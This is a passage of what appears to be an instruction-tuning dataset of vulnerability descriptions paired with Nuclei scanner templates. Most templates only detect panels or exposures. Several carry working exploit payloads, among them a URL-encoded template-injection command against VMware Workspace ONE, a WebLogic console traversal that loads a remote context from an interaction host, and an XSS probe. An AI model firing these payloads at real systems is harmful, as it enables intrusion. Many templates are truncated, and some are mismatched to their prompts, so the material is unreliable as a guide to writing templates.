Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks of this vulnerability can result in takeover of Oracle Concurrent Processing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: oracle concurrent_processing\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-61882\n\ninfo:\n name: Oracle E-Business Suite 12.2.3\u201312.2.14 \u2013 Remote Code Execution\n author: DhiyaneshDk,watchtowr\n severity: critical\n description: Oracle Concurrent Processing 12.2.3-12.2.14 contains a remote code execution caused by unauthenticated network access via HTTP, letting unauthenticated attackers fully compromise the system, exploit requires network access via HTTP.\n tags: cve,cve2025,oracle,ebusiness,lfi,rce,ssrf,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2025-61882"} +{"instruction": "Generate a Nuclei template for CVE-2024-5975", "input": "Title: SQL Injection in contrive cz_loan_management\nSummary: The CZ Loan Management WordPress plugin through 1.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: contrive cz_loan_management\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-5975\n\ninfo:\n name: CZ Loan Management <= 1.1 - SQL Injection\n author: s4e-io\n severity: critical\n description: The CZ Loan Management WordPress plugin through 1.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-5975"} +{"instruction": "Generate a Nuclei template to detect Improper Neutralization of Special Elements Used in a Template Engine", "input": "Title: Improper Neutralization of Special Elements Used in a Template Engine (CWE-1336)\nSummary: The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine. Many web applications use template engines that allow developers to insert externally-influenced values into free text or messages in order to generate a full web page, document, message, etc. Such engines include Twig, Jinja2, Pug\nVulnerability Type: Improper Neutralization of Special Elements Used in a Template Engine\nSeverity: high\nIndicators: error", "output": "id: pdf-signer-ssti-to-rce\n\ninfo:\n name: PDF Signer 3.0 - Template Injection\n author: madrobot\n severity: critical\n description: PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server.\n tags: ssti,rce,csrf,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: regex\n part: body", "category": "cwe", "severity": "high", "id": "CWE-1336"} +{"instruction": "Generate a Nuclei template for CVE-2017-9805", "input": "Title: Deserialization of Untrusted Data in apache struts and others\nSummary: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: high\nAffected Products: apache struts, cisco digital_media_manager, cisco hosted_collaboration_solution\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-9805\n\ninfo:\n name: Apache Struts2 S2-052 - Remote Code Execution\n author: pikpikcu\n severity: high\n description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.\n tags: cve,cve2017,apache,rce,struts,kev,vkev,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/struts2-rest-showcase/orders/3\" \n - \"{{BaseURL}}/orders/3\" \n matchers:\n - type: word\n words:\n - \"Debugging information\" \n - \"com.thoughtworks.xstream.converters.collections.MapConverter\" \n condition: and\n - type: status\n status:\n - 500", "category": "cve", "severity": "high", "id": "CVE-2017-9805"} +{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: processmaker-lfi\n\ninfo:\n name: ProcessMaker <=3.5.4 - Local File Inclusion\n author: KrE80r\n severity: high\n description: ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion.\n tags: processmaker,lfi,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"ProcessMaker\" \n - \"processmaker_login.png\" \n part: body\n condition: and\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} +{"instruction": "Generate a Nuclei template for: PlantUMLServer - Detect", "input": "Title: PlantUMLServer - Detect\nSummary: PlantUMLServer - Detect. PlantUMLServer is an open-source web application that renders UML diagrams from textual descriptions. It provides a web interface for the PlantUML diagram generation tool, allowing users to create various types of diagrams including class diagrams, sequence diagrams, and activity diagrams through a simple markup language.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: plantumlserver-detect\n\ninfo:\n name: PlantUMLServer - Detect\n author: s4e-io\n severity: info\n description: PlantUMLServer is an open-source web application that renders UML diagrams from textual descriptions. It provides a web interface for the PlantUML diagram generation tool, allowing users to create various types of diagrams including class diagrams, sequence diagrams, and activity diagrams through a simple markup language.\n tags: tech,uml,plantuml,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl", "category": "generic", "severity": "info", "id": "plantumlserver-detect"} +{"instruction": "Generate a Nuclei template for CVE-2023-27163", "input": "Title: Vulnerability (CWE-918) in rbaskets request_baskets\nSummary: request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: medium\nAffected Products: rbaskets request_baskets\nIndicators: error, vulnerability detected", "output": "id: request-baskets-exposure\n\ninfo:\n name: Request Baskets - Exposure\n author: DhiyaneshDk\n severity: low\n description: Request Baskets is exposed.\n tags: misconfig,requests-baskets,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web\" \n matchers:\n - type: word\n words:\n - \"Request Baskets\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-27163"} +{"instruction": "Generate a Nuclei template for: Custom Fonts \u2013 Host Your Fonts Locally Detection", "input": "Title: Custom Fonts \u2013 Host Your Fonts Locally Detection\nSummary: Custom Fonts \u2013 Host Your Fonts Locally Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-custom-fonts\n\ninfo:\n name: Custom Fonts \u2013 Host Your Fonts Locally Detection\n author: ricardomaia\n severity: info\n description: Custom Fonts \u2013 Host Your Fonts Locally Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-custom-fonts"} +{"instruction": "Generate a Nuclei template for: Feiyuxing Information - Exposure", "input": "Title: Feiyuxing Information - Exposure\nSummary: Feiyuxing Information - Exposure. Feiyuxing enterprise-level intelligent online behavior management system has authority bypass and information leakage vulnerabilities, which can obtain administrator rights and user passwords\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: feiyuxing-info-leak\n\ninfo:\n name: Feiyuxing Information - Exposure\n author: SleepingBag945\n severity: high\n description: Feiyuxing enterprise-level intelligent online behavior management system has authority bypass and information leakage vulnerabilities, which can obtain administrator rights and user passwords\n tags: misconfig,exposure,iot,wpa,wpa2,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/request_para.cgi?parameter=wifi_get_5g_host\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "feiyuxing-info-leak"} +{"instruction": "Generate a Nuclei template for: OpenEdge Login Panel - Detect", "input": "Title: OpenEdge Login Panel - Detect\nSummary: OpenEdge Login Panel - Detect. An OpenEdge login panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: openedge-panel\n\ninfo:\n name: OpenEdge Login Panel - Detect\n author: rxerium\n severity: info\n description: An OpenEdge login panel was detected.\n tags: panel,openedge,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Welcome to Progress Application Server for OpenEdge\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "openedge-panel"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mixi\n\ninfo:\n name: Mixi User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Mixi user name information check was conducted.\n tags: osint,osint-social,mixi,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://mixi.jp/view_community.pl?id={{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"| mixi\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2023-1454", "input": "Title: SQL Injection in jeecg jeecg-boot\nSummary: A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223299.\nVulnerability Type: SQL Injection\nSeverity: medium\nAffected Products: jeecg jeecg-boot\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-1454\n\ninfo:\n name: Jeecg-boot 3.5.0 qurestSql - SQL Injection\n author: DhiyaneshDK\n severity: critical\n description: A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n tags: cve2023,cve,jeecg,sqli,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"SQLException\" \n - \"XPATH syntax error:\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-1454"} +{"instruction": "Generate a Nuclei template for: Zimbra Security Checks", "input": "Title: Zimbra Security Checks\nSummary: Zimbra Security Checks. A simple workflow that runs all Zimbra related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: zimbra-workflow\n\ninfo:\n name: Zimbra Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Zimbra related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "zimbra-workflow"} +{"instruction": "Generate a Nuclei template for CVE-2024-48455", "input": "Title: Unknown Vulnerability in CVE-2024-48455\nSummary: An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the mode_name, wl_link parameters of the skk_get.cgi component.\nVulnerability Type: Unknown Vulnerability\nSeverity: low\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-48455\n\ninfo:\n name: Netis Wifi Router - Information Disclosure\n author: s4e-io\n severity: high\n description: An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the mode_name, wl_link parameters of the skk_get.cgi component.\n tags: netis,router,exposure,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "low", "id": "CVE-2024-48455"} +{"instruction": "Generate a Nuclei template for CVE-2014-100004", "input": "Title: Cross-Site Scripting (XSS) in sitecore cms\nSummary: Cross-site scripting (XSS) vulnerability in Sitecore CMS before 7.0 Update-4 (rev. 140120) allows remote attackers to inject arbitrary web script or HTML via the xmlcontrol parameter to the default URI. NOTE: some of these details are obtained from third party information.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: sitecore cms\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-100004\n\ninfo:\n name: Sitecore CMS - Cross-Site Scripting\n author: DhiyaneshDK\n severity: medium\n description: Sitecore CMS contains a cross-site scripting vulnerability via the \"special way\" of displaying XML Controls directly, which allows for a Cross Site Scripting Attack.\n tags: cve,cve2014,xss,sitecore,cms,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2014-100004"} +{"instruction": "Generate a Nuclei template for: Easypost API Token", "input": "Title: Easypost API Token\nSummary: Easypost API Token. Tags: easypost, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: easypost-token\n\ninfo:\n name: Easypost API Token\n author: DhiyaneshDK\n severity: info\n description: Easypost API Token\n tags: easypost,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "easypost-token"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ruijie-information-disclosure\n\ninfo:\n name: Ruijie Login Panel - Detect\n author: pikpikcu\n severity: high\n description: Ruijie login panel was detected and leaks authentication credentials.\n tags: ruijie,config,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.php\" \n matchers:\n - type: regex\n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: vero\n\ninfo:\n name: Vero User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Vero user name information check was conducted.\n tags: osint,osint-art,vero,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://vero.co/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"on VERO\u2122\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Seagate NAS Login - Detect", "input": "Title: Seagate NAS Login - Detect\nSummary: Seagate NAS Login - Detect. Seagate NAS - SEAGATE Login was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: seagate-nas-login\n\ninfo:\n name: Seagate NAS Login - Detect\n author: JustaAcat\n severity: info\n description: Seagate NAS - SEAGATE Login was detected.\n tags: panel,seagate,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Seagate NAS - SEAGATE\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "seagate-nas-login"} +{"instruction": "Generate a Nuclei template for CVE-2020-14882", "input": "Title: Unknown Vulnerability in oracle weblogic_server\nSummary: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: oracle weblogic_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-14882\n\ninfo:\n name: Oracle Weblogic Server - Remote Command Execution\n author: dwisiswant0\n severity: critical\n description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.\n tags: cve2020,cve,oracle,rce,weblogic,oast,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')\" \n matchers:\n - type: word\n words:\n - \"ADMINCONSOLESESSION\" \n part: header\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol", "category": "cve", "severity": "critical", "id": "CVE-2020-14882"} +{"instruction": "Generate a Nuclei template for: Erlang/OTP SSH Server - Detect", "input": "Title: Erlang/OTP SSH Server - Detect\nSummary: Erlang/OTP SSH Server - Detect. Detects Erlang/OTP SSH servers and parses the version number from the banner.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: erlang-otp-ssh-detect\n\ninfo:\n name: Erlang/OTP SSH Server - Detect\n author: darses\n severity: info\n description: Detects Erlang/OTP SSH servers and parses the version number from the banner.\n tags: network,ssh,erlang,detect,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "erlang-otp-ssh-detect"} +{"instruction": "Generate a Nuclei template for CVE-2022-45805", "input": "Title: SQL Injection in paytm payment_gateway\nSummary: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Paytm Paytm Payment Gateway paytm-payments allows SQL Injection.This issue affects Paytm Payment Gateway: from n/a through 2.7.3.\n\n\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: paytm payment_gateway\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-45805\n\ninfo:\n name: WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection\n author: theamanrawat\n severity: critical\n description: WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated,paytm,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2022-45805"} +{"instruction": "Generate a Nuclei template for CVE-2022-22954", "input": "Title: Code Injection in vmware identity_manager and others\nSummary: VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: vmware identity_manager, vmware vrealize_automation, vmware workspace_one_access\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-22954\n\ninfo:\n name: VMware Workspace ONE Access - Server-Side Template Injection\n author: sherlocksecurity\n severity: critical\n description: VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d\" \n matchers:\n - type: word\n words:\n - \"Authorization context is not valid\" \n part: body\n - type: status\n status:\n - 400", "category": "cve", "severity": "critical", "id": "CVE-2022-22954"} +{"instruction": "Generate a Nuclei template for: Pritunl - Panel", "input": "Title: Pritunl - Panel\nSummary: Pritunl - Panel. Realtime website and application monitoring tool\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: pritunl-panel\n\ninfo:\n name: Pritunl - Panel\n author: irshad ahamed\n severity: info\n description: Realtime website and application monitoring tool\n tags: pritunl,panel,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"Pritunl\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "pritunl-panel"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: armorgames\n\ninfo:\n name: ArmorGames User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: ArmorGames user name information check was conducted.\n tags: osint,osint-gaming,armorgames,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://armorgames.com/user/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"about\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: WS FTP File Disclosure", "input": "Title: WS FTP File Disclosure\nSummary: WS FTP File Disclosure. WS_FTP software, which is a popular FTP (File Transfer Protocol) client used for transferring files between a local computer and a remote server has its log file exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: ws-ftp-log\n\ninfo:\n name: WS FTP File Disclosure\n author: Hardik-Solanki\n severity: low\n description: WS_FTP software, which is a popular FTP (File Transfer Protocol) client used for transferring files between a local computer and a remote server has its log file exposed.\n tags: exposure,ftp,logs,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ws_ftp.log\" \n - \"{{BaseURL}}/WS_FTP.LOG\" \n matchers:\n - type: regex\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "ws-ftp-log"} +{"instruction": "Generate a Nuclei template for CVE-2025-5605", "input": "Title: Vulnerability (CWE-290) in CVE-2025-5605\nSummary: An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure.\n\nThe known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.\nVulnerability Type: Vulnerability (CWE-290)\nSeverity: medium\nIndicators: unauthorized", "output": "id: CVE-2025-5605\n\ninfo:\n name: WSO2 Management Console - Authentication Bypass\n author: DhiyaneshDK\n severity: medium\n description: An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure. The known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.\n tags: cve,cve2025,wso2,auth-bypass\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Memory Statistics\" \n - \"Collection Usage\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2025-5605"} +{"instruction": "Generate a Nuclei template for CVE-2022-43140", "input": "Title: Vulnerability (CWE-918) in keking kkfileview\nSummary: kkFileView v4.1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. This vulnerability allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the url parameter.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: high\nAffected Products: keking kkfileview\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-43140\n\ninfo:\n name: kkFileView 4.1.0 - Server-Side Request Forgery\n author: Co5mos\n severity: high\n description: kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n tags: cve2022,cve,ssrf,kkFileview,keking,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}\" \n matchers:\n - type: word\n words:\n - \"

Interactsh Server

\" \n part: body", "category": "cve", "severity": "high", "id": "CVE-2022-43140"} +{"instruction": "Generate a Nuclei template for: Private Service Connect Endpoints Not Configured", "input": "Title: Private Service Connect Endpoints Not Configured\nSummary: Private Service Connect Endpoints Not Configured. Ensure that Private Service Connect (PSC) endpoints are configured for your Virtual Private Cloud (VPC) networks. Private Service Connect creates a secure, private tunnel between your VPC network and Google's services (or your own services in another VPC) so traffic never touches the public internet. This enhances security and avoids complexities of managing public connections.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-vpc-private-service-connect\n\ninfo:\n name: Private Service Connect Endpoints Not Configured\n author: princechaddha\n severity: medium\n description: Ensure that Private Service Connect (PSC) endpoints are configured for your Virtual Private Cloud (VPC) networks. Private Service Connect creates a secure, private tunnel between your VPC network and Google's services (or your own services in another VPC) so traffic never touches the public internet. This enhances security and avoids complexities of managing public connections.\n tags: cloud,devops,gcp,gcloud,vpc,networking,security,psc,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-vpc-private-service-connect"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: giters\n\ninfo:\n name: Giters User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Giters user name information check was conducted.\n tags: osint,osint-coding,giters,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://giters.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \" - Giters\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2023-23063", "input": "Title: Path Traversal in cellinx nvt_web_server\nSummary: Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component 